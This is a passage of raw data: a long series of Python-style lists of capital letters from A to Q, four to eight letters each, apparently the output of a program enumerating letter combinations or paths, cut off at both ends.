['K', 'I', 'G', 'L'], ['K', 'I', 'M', 'L'], ['K', 'G', 'M', 'L'], ['P', 'H', 'D', 'M'], ['P', 'O', 'D', 'G'], ['P', 'O', 'Q', 'G'], ['P', 'O', 'Q', 'M'], ['P', 'O', 'Q', 'L'], ['P', 'O', 'G', 'M'], ['P', 'D', 'Q', 'L'], ['P', 'D', 'G', 'L'], ['P', 'Q', 'M', 'L'], ['P', 'G', 'M', 'L'], ['H', 'O', 'D', 'G'], ['H', 'D', 'Q', 'M'], ['H', 'D', 'Q', 'L'], ['H', 'D', 'I', 'G'], ['H', 'D', 'I', 'M'], ['H', 'D', 'I', 'L'], ['H', 'D', 'G', 'M'], ['H', 'D', 'G', 'L'], ['H', 'D', 'M', 'L'], ['O', 'D', 'Q', 'G'], ['O', 'D', 'I', 'G'], ['O', 'Q', 'I', 'L'], ['O', 'Q', 'G', 'M'], ['O', 'Q', 'G', 'L'], ['O', 'Q', 'M', 'L'], ['O', 'I', 'G', 'M'], ['D', 'Q', 'I', 'L'], ['D', 'I', 'G', 'L'], ['Q', 'I', 'M', 'L'], ['I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'I'], ['N', 'J', 'E', 'F', 'K'], ['N', 'J', 'E', 'F', 'B'], ['N', 'C', 'E', 'A', 'I'], ['N', 'C', 'E', 'K', 'I'], ['N', 'C', 'E', 'O', 'I'], ['N', 'C', 'E', 'I', 'G'], ['N', 'C', 'E', 'I', 'L'], ['N', 'E', 'K', 'B', 'H'], ['N', 'K', 'P', 'H', 'M'], ['N', 'K', 'P', 'I', 'M'], ['N', 'K', 'H', 'D', 'I'], ['N', 'K', 'O', 'I', 'G'], ['N', 'K', 'Q', 'I', 'L'], ['N', 'K', 'I', 'G', 'L'], ['N', 'P', 'O', 'I', 'G'], ['N', 'P', 'O', 'I', 'M'], ['N', 'P', 'D', 'I', 'G'], ['N', 'P', 'D', 'I', 'L'], ['N', 'P', 'Q', 'I', 'L'], ['N', 'P', 'I', 'G', 'M'], ['N', 'P', 'I', 'G', 'L'], ['N', 'P', 'I', 'M', 'L'], ['N', 'H', 'D', 'I', 'G'], ['N', 'H', 'D', 'I', 'L'], ['N', 'O', 'D', 'I', 'G'], ['N', 'O', 'Q', 'I', 'L'], ['N', 'D', 'Q', 'I', 'L'], ['N', 'D', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'K'], ['J', 'C', 'E', 'F', 'O'], ['J', 'C', 'E', 'F', 'Q'], ['J', 'C', 'E', 'F', 'G'], ['J', 'C', 'E', 'A', 'P'], ['J', 'C', 'E', 'A', 'O'], ['J', 'C', 'E', 'A', 'D'], ['J', 'C', 'E', 'A', 'Q'], ['J', 'C', 'E', 'P', 'O'], ['J', 'C', 'E', 'P', 'Q'], ['J', 'C', 'E', 'P', 'G'], ['J', 'C', 'E', 'O', 'Q'], ['J', 'C', 'E', 'O', 'G'], ['J', 'E', 'F', 'B', 'H'], ['J', 'E', 'F', 'P', 'M'], ['J', 'F', 'A', 'B', 'O'], ['J', 'F', 'A', 'B', 'Q'], ['J', 'F', 'A', 'B', 'L'], 
['J', 'F', 'K', 'B', 'H'], ['J', 'F', 'K', 'P', 'M'], ['J', 'F', 'K', 'O', 'G'], ['J', 'F', 'K', 'Q', 'L'], ['J', 'F', 'K', 'G', 'L'], ['J', 'F', 'B', 'P', 'M'], ['J', 'F', 'P', 'O', 'M'], ['J', 'F', 'P', 'Q', 'M'], ['J', 'F', 'P', 'G', 'M'], ['J', 'F', 'P', 'M', 'L'], ['J', 'F', 'O', 'Q', 'G'], ['J', 'F', 'O', 'Q', 'L'], ['J', 'A', 'P', 'O', 'Q'], ['J', 'A', 'P', 'D', 'Q'], ['J', 'A', 'P', 'D', 'G'], ['J', 'A', 'P', 'D', 'L'], ['J', 'A', 'P', 'Q', 'L'], ['J', 'A', 'O', 'D', 'G'], ['J', 'A', 'O', 'Q', 'L'], ['J', 'A', 'D', 'Q', 'L'], ['J', 'A', 'D', 'G', 'L'], ['J', 'P', 'O', 'Q', 'G'], ['J', 'P', 'O', 'Q', 'L'], ['J', 'O', 'Q', 'G', 'L'], ['C', 'E', 'A', 'B', 'O'], ['C', 'E', 'A', 'B', 'Q'], ['C', 'E', 'A', 'O', 'Q'], ['C', 'E', 'A', 'D', 'Q'], ['C', 'E', 'A', 'D', 'G'], ['C', 'E', 'K', 'O', 'G'], ['C', 'E', 'O', 'Q', 'G'], ['C', 'F', 'A', 'B', 'O'], ['C', 'F', 'A', 'B', 'Q'], ['C', 'F', 'A', 'B', 'I'], ['C', 'F', 'A', 'B', 'M'], ['C', 'F', 'K', 'O', 'G'], ['C', 'F', 'K', 'Q', 'M'], ['C', 'F', 'K', 'I', 'G'], ['C', 'F', 'K', 'I', 'M'], ['C', 'F', 'K', 'I', 'L'], ['C', 'F', 'K', 'G', 'M'], ['C', 'F', 'O', 'Q', 'G'], ['C', 'F', 'O', 'Q', 'M'], ['C', 'F', 'O', 'I', 'G'], ['C', 'F', 'O', 'I', 'M'], ['C', 'F', 'O', 'G', 'M'], ['C', 'F', 'Q', 'I', 'L'], ['C', 'F', 'I', 'G', 'M'], ['C', 'F', 'I', 'G', 'L'], ['C', 'F', 'I', 'M', 'L'], ['C', 'A', 'B', 'H', 'D'], ['C', 'A', 'B', 'O', 'Q'], ['C', 'A', 'B', 'O', 'I'], ['C', 'A', 'B', 'I', 'L'], ['C', 'A', 'O', 'D', 'G'], ['C', 'A', 'D', 'I', 'G'], ['C', 'A', 'D', 'I', 'L'], ['C', 'A', 'Q', 'I', 'L'], ['C', 'K', 'O', 'Q', 'G'], ['C', 'K', 'O', 'I', 'G'], ['C', 'K', 'Q', 'I', 'L'], ['C', 'K', 'I', 'G', 'L'], ['C', 'O', 'Q', 'I', 'L'], ['F', 'A', 'B', 'H', 'D'], ['F', 'A', 'B', 'O', 'Q'], ['F', 'A', 'B', 'O', 'M'], ['F', 'A', 'B', 'Q', 'M'], ['F', 'A', 'B', 'Q', 'L'], ['F', 'A', 'B', 'M', 'L'], ['F', 'K', 'B', 'H', 'M'], ['F', 'K', 'O', 'Q', 'G'], ['F', 'K', 'O', 'G', 'M'], ['F', 'K', 'Q', 'M', 'L'], ['F', 'K', 'G', 'M', 'L'], 
['F', 'O', 'Q', 'G', 'M'], ['F', 'O', 'Q', 'G', 'L'], ['F', 'O', 'Q', 'M', 'L'], ['A', 'K', 'B', 'H', 'D'], ['A', 'B', 'H', 'D', 'Q'], ['A', 'B', 'H', 'D', 'G'], ['A', 'B', 'H', 'D', 'L'], ['A', 'B', 'O', 'Q', 'L'], ['A', 'O', 'D', 'Q', 'G'], ['K', 'P', 'H', 'D', 'M'], ['K', 'P', 'O', 'G', 'M'], ['K', 'P', 'Q', 'M', 'L'], ['K', 'P', 'G', 'M', 'L'], ['K', 'H', 'O', 'D', 'G'], ['K', 'H', 'D', 'Q', 'M'], ['K', 'H', 'D', 'Q', 'L'], ['K', 'H', 'D', 'I', 'G'], ['K', 'H', 'D', 'I', 'M'], ['K', 'H', 'D', 'I', 'L'], ['K', 'H', 'D', 'G', 'M'], ['K', 'H', 'D', 'G', 'L'], ['K', 'H', 'D', 'M', 'L'], ['K', 'O', 'Q', 'G', 'M'], ['K', 'O', 'Q', 'G', 'L'], ['K', 'O', 'I', 'G', 'M'], ['K', 'Q', 'I', 'M', 'L'], ['K', 'I', 'G', 'M', 'L'], ['P', 'H', 'D', 'Q', 'M'], ['P', 'H', 'D', 'G', 'M'], ['P', 'H', 'D', 'M', 'L'], ['P', 'O', 'D', 'Q', 'G'], ['P', 'O', 'Q', 'G', 'M'], ['P', 'O', 'Q', 'G', 'L'], ['P', 'O', 'Q', 'M', 'L'], ['H', 'O', 'D', 'Q', 'G'], ['H', 'O', 'D', 'I', 'G'], ['H', 'O', 'D', 'G', 'M'], ['H', 'D', 'Q', 'I', 'L'], ['H', 'D', 'Q', 'M', 'L'], ['H', 'D', 'I', 'G', 'M'], ['H', 'D', 'I', 'G', 'L'], ['H', 'D', 'I', 'M', 'L'], ['H', 'D', 'G', 'M', 'L'], ['O', 'D', 'Q', 'G', 'L'], ['O', 'Q', 'I', 'G', 'L'], ['O', 'Q', 'I', 'M', 'L'], ['O', 'Q', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'I'], ['N', 'J', 'C', 'E', 'A', 'I'], ['N', 'J', 'C', 'E', 'P', 'I'], ['N', 'J', 'C', 'E', 'O', 'I'], ['N', 'J', 'C', 'E', 'I', 'G'], ['N', 'J', 'C', 'E', 'I', 'L'], ['N', 'J', 'E', 'F', 'B', 'H'], ['N', 'J', 'E', 'F', 'P', 'M'], ['N', 'C', 'E', 'A', 'B', 'I'], ['N', 'C', 'E', 'A', 'O', 'I'], ['N', 'C', 'E', 'A', 'D', 'I'], ['N', 'C', 'E', 'A', 'I', 'L'], ['N', 'C', 'E', 'K', 'I', 'G'], ['N', 'C', 'E', 'K', 'I', 'L'], ['N', 'C', 'E', 'O', 'I', 'G'], ['N', 'C', 'E', 'Q', 'I', 'L'], ['N', 'C', 'E', 'I', 'G', 'L'], ['N', 'K', 'P', 'I', 'G', 'M'], ['N', 'K', 'P', 'I', 'M', 'L'], ['N', 'K', 'H', 'D', 'I', 'G'], ['N', 'K', 'H', 'D', 'I', 'L'], ['N', 'P', 'H', 'D', 'I', 'M'], ['N', 'P', 'O', 'D', 'I', 
'G'], ['N', 'P', 'O', 'Q', 'I', 'L'], ['N', 'P', 'O', 'I', 'G', 'M'], ['N', 'P', 'D', 'Q', 'I', 'L'], ['N', 'P', 'D', 'I', 'G', 'L'], ['N', 'P', 'Q', 'I', 'M', 'L'], ['N', 'P', 'I', 'G', 'M', 'L'], ['N', 'H', 'O', 'D', 'I', 'G'], ['N', 'H', 'D', 'Q', 'I', 'L'], ['N', 'H', 'D', 'I', 'G', 'L'], ['N', 'O', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'B'], ['J', 'C', 'E', 'F', 'K', 'Q'], ['J', 'C', 'E', 'F', 'K', 'G'], ['J', 'C', 'E', 'F', 'P', 'M'], ['J', 'C', 'E', 'F', 'O', 'Q'], ['J', 'C', 'E', 'F', 'O', 'G'], ['J', 'C', 'E', 'A', 'P', 'O'], ['J', 'C', 'E', 'A', 'P', 'D'], ['J', 'C', 'E', 'A', 'P', 'Q'], ['J', 'C', 'E', 'A', 'O', 'Q'], ['J', 'C', 'E', 'A', 'D', 'Q'], ['J', 'C', 'E', 'A', 'D', 'G'], ['J', 'C', 'E', 'P', 'O', 'Q'], ['J', 'C', 'E', 'P', 'O', 'G'], ['J', 'C', 'E', 'O', 'Q', 'G'], ['J', 'E', 'F', 'K', 'B', 'H'], ['J', 'E', 'F', 'K', 'P', 'M'], ['J', 'E', 'F', 'B', 'P', 'M'], ['J', 'F', 'A', 'B', 'P', 'M'], ['J', 'F', 'A', 'B', 'H', 'D'], ['J', 'F', 'A', 'B', 'O', 'Q'], ['J', 'F', 'A', 'B', 'Q', 'L'], ['J', 'F', 'K', 'P', 'Q', 'M'], ['J', 'F', 'K', 'P', 'G', 'M'], ['J', 'F', 'K', 'P', 'M', 'L'], ['J', 'F', 'K', 'O', 'Q', 'G'], ['J', 'F', 'B', 'P', 'H', 'M'], ['J', 'F', 'P', 'O', 'Q', 'M'], ['J', 'F', 'P', 'O', 'G', 'M'], ['J', 'F', 'P', 'Q', 'M', 'L'], ['J', 'F', 'P', 'G', 'M', 'L'], ['J', 'F', 'O', 'Q', 'G', 'L'], ['J', 'A', 'P', 'O', 'D', 'G'], ['J', 'A', 'P', 'O', 'Q', 'L'], ['J', 'A', 'P', 'D', 'Q', 'L'], ['J', 'A', 'P', 'D', 'G', 'L'], ['J', 'A', 'O', 'D', 'Q', 'G'], ['J', 'P', 'O', 'Q', 'G', 'L'], ['C', 'E', 'A', 'B', 'H', 'D'], ['C', 'E', 'A', 'B', 'O', 'Q'], ['C', 'E', 'A', 'O', 'D', 'G'], ['C', 'E', 'K', 'O', 'Q', 'G'], ['C', 'F', 'A', 'B', 'H', 'D'], ['C', 'F', 'A', 'B', 'O', 'Q'], ['C', 'F', 'A', 'B', 'O', 'I'], ['C', 'F', 'A', 'B', 'O', 'M'], ['C', 'F', 'A', 'B', 'Q', 'M'], ['C', 'F', 'A', 'B', 'I', 'M'], ['C', 'F', 'A', 'B', 'I', 'L'], ['C', 'F', 'K', 'O', 'Q', 'G'], ['C', 'F', 'K', 'O', 'I', 'G'], ['C', 'F', 'K', 'O', 'G', 'M'], ['C', 
'F', 'K', 'Q', 'I', 'L'], ['C', 'F', 'K', 'I', 'G', 'M'], ['C', 'F', 'K', 'I', 'G', 'L'], ['C', 'F', 'K', 'I', 'M', 'L'], ['C', 'F', 'O', 'Q', 'I', 'L'], ['C', 'F', 'O', 'Q', 'G', 'M'], ['C', 'F', 'O', 'I', 'G', 'M'], ['C', 'F', 'Q', 'I', 'M', 'L'], ['C', 'F', 'I', 'G', 'M', 'L'], ['C', 'A', 'K', 'B', 'H', 'D'], ['C', 'A', 'B', 'H', 'D', 'Q'], ['C', 'A', 'B', 'H', 'D', 'I'], ['C', 'A', 'B', 'H', 'D', 'G'], ['C', 'A', 'B', 'Q', 'I', 'L'], ['C', 'A', 'O', 'D', 'Q', 'G'], ['C', 'A', 'O', 'D', 'I', 'G'], ['C', 'A', 'O', 'Q', 'I', 'L'], ['C', 'A', 'D', 'Q', 'I', 'L'], ['C', 'A', 'D', 'I', 'G', 'L'], ['C', 'O', 'Q', 'I', 'G', 'L'], ['F', 'A', 'K', 'B', 'H', 'D'], ['F', 'A', 'B', 'H', 'D', 'Q'], ['F', 'A', 'B', 'H', 'D', 'G'], ['F', 'A', 'B', 'H', 'D', 'M'], ['F', 'A', 'B', 'H', 'D', 'L'], ['F', 'A', 'B', 'O', 'Q', 'M'], ['F', 'A', 'B', 'O', 'Q', 'L'], ['F', 'A', 'B', 'Q', 'M', 'L'], ['F', 'K', 'O', 'Q', 'G', 'M'], ['F', 'K', 'O', 'Q', 'G', 'L'], ['F', 'O', 'Q', 'G', 'M', 'L'], ['A', 'K', 'B', 'H', 'D', 'Q'], ['A', 'K', 'B', 'H', 'D', 'G'], ['A', 'K', 'B', 'H', 'D', 'L'], ['A', 'B', 'H', 'O', 'D', 'G'], ['A', 'B', 'H', 'D', 'Q', 'L'], ['A', 'B', 'H', 'D', 'G', 'L'], ['A', 'O', 'D', 'Q', 'G', 'L'], ['K', 'P', 'H', 'D', 'Q', 'M'], ['K', 'P', 'H', 'D', 'G', 'M'], ['K', 'P', 'H', 'D', 'M', 'L'], ['K', 'P', 'O', 'Q', 'G', 'M'], ['K', 'H', 'O', 'D', 'Q', 'G'], ['K', 'H', 'O', 'D', 'I', 'G'], ['K', 'H', 'O', 'D', 'G', 'M'], ['K', 'H', 'D', 'Q', 'I', 'L'], ['K', 'H', 'D', 'Q', 'M', 'L'], ['K', 'H', 'D', 'I', 'G', 'M'], ['K', 'H', 'D', 'I', 'G', 'L'], ['K', 'H', 'D', 'I', 'M', 'L'], ['K', 'H', 'D', 'G', 'M', 'L'], ['K', 'O', 'Q', 'I', 'G', 'L'], ['K', 'O', 'Q', 'G', 'M', 'L'], ['P', 'H', 'O', 'D', 'G', 'M'], ['P', 'H', 'D', 'Q', 'M', 'L'], ['P', 'H', 'D', 'G', 'M', 'L'], ['P', 'O', 'D', 'Q', 'G', 'L'], ['P', 'O', 'Q', 'G', 'M', 'L'], ['H', 'O', 'D', 'Q', 'G', 'M'], ['H', 'O', 'D', 'Q', 'G', 'L'], ['H', 'O', 'D', 'I', 'G', 'M'], ['H', 'D', 'Q', 'I', 'M', 'L'], ['H', 'D', 'I', 'G', 
'M', 'L'], ['O', 'D', 'Q', 'I', 'G', 'L'], ['O', 'Q', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'K', 'I'], ['N', 'J', 'C', 'E', 'F', 'O', 'I'], ['N', 'J', 'C', 'E', 'F', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'P', 'I'], ['N', 'J', 'C', 'E', 'A', 'O', 'I'], ['N', 'J', 'C', 'E', 'A', 'D', 'I'], ['N', 'J', 'C', 'E', 'A', 'I', 'L'], ['N', 'J', 'C', 'E', 'P', 'O', 'I'], ['N', 'J', 'C', 'E', 'P', 'I', 'G'], ['N', 'J', 'C', 'E', 'P', 'I', 'L'], ['N', 'J', 'C', 'E', 'O', 'I', 'G'], ['N', 'J', 'C', 'E', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'I', 'G', 'L'], ['N', 'J', 'E', 'F', 'K', 'B', 'H'], ['N', 'J', 'E', 'F', 'K', 'P', 'M'], ['N', 'J', 'E', 'F', 'B', 'P', 'M'], ['N', 'C', 'E', 'A', 'B', 'O', 'I'], ['N', 'C', 'E', 'A', 'B', 'I', 'L'], ['N', 'C', 'E', 'A', 'D', 'I', 'G'], ['N', 'C', 'E', 'A', 'D', 'I', 'L'], ['N', 'C', 'E', 'A', 'Q', 'I', 'L'], ['N', 'C', 'E', 'K', 'O', 'I', 'G'], ['N', 'C', 'E', 'K', 'Q', 'I', 'L'], ['N', 'C', 'E', 'K', 'I', 'G', 'L'], ['N', 'C', 'E', 'O', 'Q', 'I', 'L'], ['N', 'K', 'P', 'H', 'D', 'I', 'M'], ['N', 'K', 'P', 'O', 'I', 'G', 'M'], ['N', 'K', 'P', 'Q', 'I', 'M', 'L'], ['N', 'K', 'P', 'I', 'G', 'M', 'L'], ['N', 'K', 'H', 'O', 'D', 'I', 'G'], ['N', 'K', 'H', 'D', 'Q', 'I', 'L'], ['N', 'K', 'H', 'D', 'I', 'G', 'L'], ['N', 'K', 'O', 'Q', 'I', 'G', 'L'], ['N', 'P', 'H', 'D', 'I', 'G', 'M'], ['N', 'P', 'H', 'D', 'I', 'M', 'L'], ['N', 'P', 'O', 'Q', 'I', 'G', 'L'], ['N', 'P', 'O', 'Q', 'I', 'M', 'L'], ['N', 'O', 'D', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'B', 'O'], ['J', 'C', 'E', 'F', 'A', 'B', 'Q'], ['J', 'C', 'E', 'F', 'K', 'P', 'M'], ['J', 'C', 'E', 'F', 'K', 'O', 'G'], ['J', 'C', 'E', 'F', 'P', 'O', 'M'], ['J', 'C', 'E', 'F', 'P', 'Q', 'M'], ['J', 'C', 'E', 'F', 'P', 'G', 'M'], ['J', 'C', 'E', 'F', 'O', 'Q', 'G'], ['J', 'C', 'E', 'A', 'P', 'O', 'Q'], ['J', 'C', 'E', 'A', 'P', 'D', 'Q'], ['J', 'C', 'E', 'A', 'P', 'D', 'G'], ['J', 'C', 'E', 'A', 'O', 'D', 'G'], ['J', 'C', 'E', 'P', 'O', 'Q', 'G'], 
['J', 'E', 'F', 'B', 'P', 'H', 'M'], ['J', 'F', 'A', 'K', 'B', 'H', 'D'], ['J', 'F', 'A', 'B', 'P', 'O', 'M'], ['J', 'F', 'A', 'B', 'P', 'Q', 'M'], ['J', 'F', 'A', 'B', 'P', 'M', 'L'], ['J', 'F', 'A', 'B', 'H', 'D', 'Q'], ['J', 'F', 'A', 'B', 'H', 'D', 'G'], ['J', 'F', 'A', 'B', 'H', 'D', 'L'], ['J', 'F', 'A', 'B', 'O', 'Q', 'L'], ['J', 'F', 'K', 'B', 'P', 'H', 'M'], ['J', 'F', 'K', 'P', 'O', 'G', 'M'], ['J', 'F', 'K', 'P', 'Q', 'M', 'L'], ['J', 'F', 'K', 'P', 'G', 'M', 'L'], ['J', 'F', 'K', 'O', 'Q', 'G', 'L'], ['J', 'F', 'P', 'O', 'Q', 'G', 'M'], ['J', 'F', 'P', 'O', 'Q', 'M', 'L'], ['J', 'A', 'P', 'O', 'D', 'Q', 'G'], ['J', 'A', 'O', 'D', 'Q', 'G', 'L'], ['C', 'E', 'A', 'K', 'B', 'H', 'D'], ['C', 'E', 'A', 'B', 'H', 'D', 'Q'], ['C', 'E', 'A', 'B', 'H', 'D', 'G'], ['C', 'E', 'A', 'O', 'D', 'Q', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D'], ['C', 'F', 'A', 'B', 'H', 'D', 'Q'], ['C', 'F', 'A', 'B', 'H', 'D', 'I'], ['C', 'F', 'A', 'B', 'H', 'D', 'G'], ['C', 'F', 'A', 'B', 'H', 'D', 'M'], ['C', 'F', 'A', 'B', 'O', 'Q', 'M'], ['C', 'F', 'A', 'B', 'O', 'I', 'M'], ['C', 'F', 'A', 'B', 'Q', 'I', 'L'], ['C', 'F', 'A', 'B', 'I', 'M', 'L'], ['C', 'F', 'K', 'O', 'Q', 'G', 'M'], ['C', 'F', 'K', 'O', 'I', 'G', 'M'], ['C', 'F', 'K', 'Q', 'I', 'M', 'L'], ['C', 'F', 'K', 'I', 'G', 'M', 'L'], ['C', 'F', 'O', 'Q', 'I', 'G', 'L'], ['C', 'F', 'O', 'Q', 'I', 'M', 'L'], ['C', 'A', 'K', 'B', 'H', 'D', 'Q'], ['C', 'A', 'K', 'B', 'H', 'D', 'I'], ['C', 'A', 'K', 'B', 'H', 'D', 'G'], ['C', 'A', 'B', 'H', 'O', 'D', 'G'], ['C', 'A', 'B', 'H', 'D', 'I', 'G'], ['C', 'A', 'B', 'H', 'D', 'I', 'L'], ['C', 'A', 'B', 'O', 'Q', 'I', 'L'], ['C', 'K', 'O', 'Q', 'I', 'G', 'L'], ['F', 'A', 'K', 'B', 'H', 'D', 'Q'], ['F', 'A', 'K', 'B', 'H', 'D', 'G'], ['F', 'A', 'K', 'B', 'H', 'D', 'M'], ['F', 'A', 'K', 'B', 'H', 'D', 'L'], ['F', 'A', 'B', 'H', 'O', 'D', 'G'], ['F', 'A', 'B', 'H', 'D', 'Q', 'M'], ['F', 'A', 'B', 'H', 'D', 'Q', 'L'], ['F', 'A', 'B', 'H', 'D', 'G', 'M'], ['F', 'A', 'B', 'H', 'D', 'G', 'L'], 
['F', 'A', 'B', 'H', 'D', 'M', 'L'], ['F', 'A', 'B', 'O', 'Q', 'M', 'L'], ['F', 'K', 'O', 'Q', 'G', 'M', 'L'], ['A', 'K', 'B', 'H', 'O', 'D', 'G'], ['A', 'K', 'B', 'H', 'D', 'Q', 'L'], ['A', 'K', 'B', 'H', 'D', 'G', 'L'], ['A', 'B', 'H', 'O', 'D', 'Q', 'G'], ['K', 'P', 'H', 'O', 'D', 'G', 'M'], ['K', 'P', 'H', 'D', 'Q', 'M', 'L'], ['K', 'P', 'H', 'D', 'G', 'M', 'L'], ['K', 'P', 'O', 'Q', 'G', 'M', 'L'], ['K', 'H', 'O', 'D', 'Q', 'G', 'M'], ['K', 'H', 'O', 'D', 'Q', 'G', 'L'], ['K', 'H', 'O', 'D', 'I', 'G', 'M'], ['K', 'H', 'D', 'Q', 'I', 'M', 'L'], ['K', 'H', 'D', 'I', 'G', 'M', 'L'], ['K', 'O', 'Q', 'I', 'G', 'M', 'L'], ['P', 'H', 'O', 'D', 'Q', 'G', 'M'], ['H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['H', 'O', 'D', 'Q', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 'B', 'I'], ['N', 'J', 'C', 'E', 'F', 'K', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'K', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'P', 'I', 'M'], ['N', 'J', 'C', 'E', 'F', 'O', 'I', 'G'], ['N', 'J', 'C', 'E', 'F', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'F', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'A', 'P', 'O', 'I'], ['N', 'J', 'C', 'E', 'A', 'P', 'D', 'I'], ['N', 'J', 'C', 'E', 'A', 'P', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'D', 'I', 'G'], ['N', 'J', 'C', 'E', 'A', 'D', 'I', 'L'], ['N', 'J', 'C', 'E', 'A', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'P', 'O', 'I', 'G'], ['N', 'J', 'C', 'E', 'P', 'Q', 'I', 'L'], ['N', 'J', 'C', 'E', 'P', 'I', 'G', 'L'], ['N', 'J', 'C', 'E', 'O', 'Q', 'I', 'L'], ['N', 'J', 'E', 'F', 'B', 'P', 'H', 'M'], ['N', 'C', 'E', 'A', 'B', 'H', 'D', 'I'], ['N', 'C', 'E', 'A', 'B', 'Q', 'I', 'L'], ['N', 'C', 'E', 'A', 'O', 'D', 'I', 'G'], ['N', 'C', 'E', 'A', 'O', 'Q', 'I', 'L'], ['N', 'C', 'E', 'A', 'D', 'Q', 'I', 'L'], ['N', 'C', 'E', 'A', 'D', 'I', 'G', 'L'], ['N', 'C', 'E', 'O', 'Q', 'I', 'G', 'L'], ['N', 'K', 'P', 'H', 'D', 'I', 'G', 'M'], ['N', 'K', 'P', 'H', 'D', 'I', 'M', 'L'], ['N', 'P', 'H', 'O', 'D', 'I', 'G', 'M'], ['N', 'P', 'H', 'D', 'Q', 'I', 'M', 'L'], ['N', 'P', 'H', 'D', 'I', 'G', 'M', 'L'], 
['N', 'P', 'O', 'D', 'Q', 'I', 'G', 'L'], ['N', 'P', 'O', 'Q', 'I', 'G', 'M', 'L'], ['N', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['J', 'C', 'E', 'F', 'A', 'B', 'P', 'M'], ['J', 'C', 'E', 'F', 'A', 'B', 'H', 'D'], ['J', 'C', 'E', 'F', 'A', 'B', 'O', 'Q'], ['J', 'C', 'E', 'F', 'K', 'P', 'Q', 'M'], ['J', 'C', 'E', 'F', 'K', 'P', 'G', 'M'], ['J', 'C', 'E', 'F', 'K', 'O', 'Q', 'G'], ['J', 'C', 'E', 'F', 'P', 'O', 'Q', 'M'], ['J', 'C', 'E', 'F', 'P', 'O', 'G', 'M'], ['J', 'C', 'E', 'A', 'P', 'O', 'D', 'G'], ['J', 'C', 'E', 'A', 'O', 'D', 'Q', 'G'], ['J', 'E', 'F', 'K', 'B', 'P', 'H', 'M'], ['J', 'F', 'A', 'K', 'B', 'H', 'D', 'Q'], ['J', 'F', 'A', 'K', 'B', 'H', 'D', 'G'], ['J', 'F', 'A', 'K', 'B', 'H', 'D', 'L'], ['J', 'F', 'A', 'B', 'P', 'H', 'D', 'M'], ['J', 'F', 'A', 'B', 'P', 'O', 'Q', 'M'], ['J', 'F', 'A', 'B', 'P', 'Q', 'M', 'L'], ['J', 'F', 'A', 'B', 'H', 'O', 'D', 'G'], ['J', 'F', 'A', 'B', 'H', 'D', 'Q', 'L'], ['J', 'F', 'A', 'B', 'H', 'D', 'G', 'L'], ['J', 'F', 'K', 'P', 'O', 'Q', 'G', 'M'], ['J', 'F', 'P', 'O', 'Q', 'G', 'M', 'L'], ['J', 'A', 'P', 'O', 'D', 'Q', 'G', 'L'], ['C', 'E', 'A', 'K', 'B', 'H', 'D', 'Q'], ['C', 'E', 'A', 'K', 'B', 'H', 'D', 'G'], ['C', 'E', 'A', 'B', 'H', 'O', 'D', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'Q'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'I'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'G'], ['C', 'F', 'A', 'K', 'B', 'H', 'D', 'M'], ['C', 'F', 'A', 'B', 'H', 'O', 'D', 'G'], ['C', 'F', 'A', 'B', 'H', 'D', 'Q', 'M'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'G'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'M'], ['C', 'F', 'A', 'B', 'H', 'D', 'I', 'L'], ['C', 'F', 'A', 'B', 'H', 'D', 'G', 'M'], ['C', 'F', 'A', 'B', 'O', 'Q', 'I', 'L'], ['C', 'F', 'A', 'B', 'Q', 'I', 'M', 'L'], ['C', 'F', 'K', 'O', 'Q', 'I', 'G', 'L'], ['C', 'F', 'O', 'Q', 'I', 'G', 'M', 'L'], ['C', 'A', 'K', 'B', 'H', 'O', 'D', 'G'], ['C', 'A', 'K', 'B', 'H', 'D', 'I', 'G'], ['C', 'A', 'K', 'B', 'H', 'D', 'I', 'L'], ['C', 'A', 'B', 'H', 'O', 'D', 'Q', 'G'], ['C', 'A', 'B', 'H', 'O', 
'D', 'I', 'G'], ['C', 'A', 'B', 'H', 'D', 'Q', 'I', 'L'], ['C', 'A', 'B', 'H', 'D', 'I', 'G', 'L'], ['C', 'A', 'O', 'D', 'Q', 'I', 'G', 'L'], ['F', 'A', 'K', 'B', 'H', 'O', 'D', 'G'], ['F', 'A', 'K', 'B', 'H', 'D', 'Q', 'M'], ['F', 'A', 'K', 'B', 'H', 'D', 'Q', 'L'], ['F', 'A', 'K', 'B', 'H', 'D', 'G', 'M'], ['F', 'A', 'K', 'B', 'H', 'D', 'G', 'L'], ['F', 'A', 'K', 'B', 'H', 'D', 'M', 'L'], ['F', 'A', 'B', 'H', 'O', 'D', 'Q', 'G'], ['F', 'A', 'B', 'H', 'O', 'D', 'G', 'M'], ['F', 'A', 'B', 'H', 'D', 'Q', 'M', 'L'], ['F', 'A', 'B', 'H', 'D', 'G', 'M', 'L'], ['A', 'K', 'B', 'H', 'O', 'D', 'Q', 'G'], ['A', 'B', 'H', 'O', 'D', 'Q', 'G', 'L'], ['K', 'P', 'H', 'O', 'D', 'Q', 'G', 'M'], ['K', 'H', 'O', 'D', 'Q', 'I', 'G', 'L'], ['K', 'H', 'O', 'D', 'Q', 'G', 'M', 'L'], ['P', 'H', 'O', 'D', 'Q', 'G', 'M', 'L'], ['H', 'O', 'D', 'Q', 'I', 'G', 'M', 'L'], ['N', 'J', 'C', 'E', 'F', 'A', 